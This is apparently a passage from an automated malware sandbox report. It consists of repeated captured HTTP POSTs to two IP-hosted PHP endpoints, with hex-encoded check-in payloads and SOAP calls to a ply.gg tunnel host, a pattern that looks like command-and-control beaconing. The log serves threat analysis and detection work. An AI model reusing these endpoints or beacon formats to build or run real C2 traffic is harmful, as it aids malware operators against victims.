                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: b-stamps.gl.at.ply.gg:30946Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
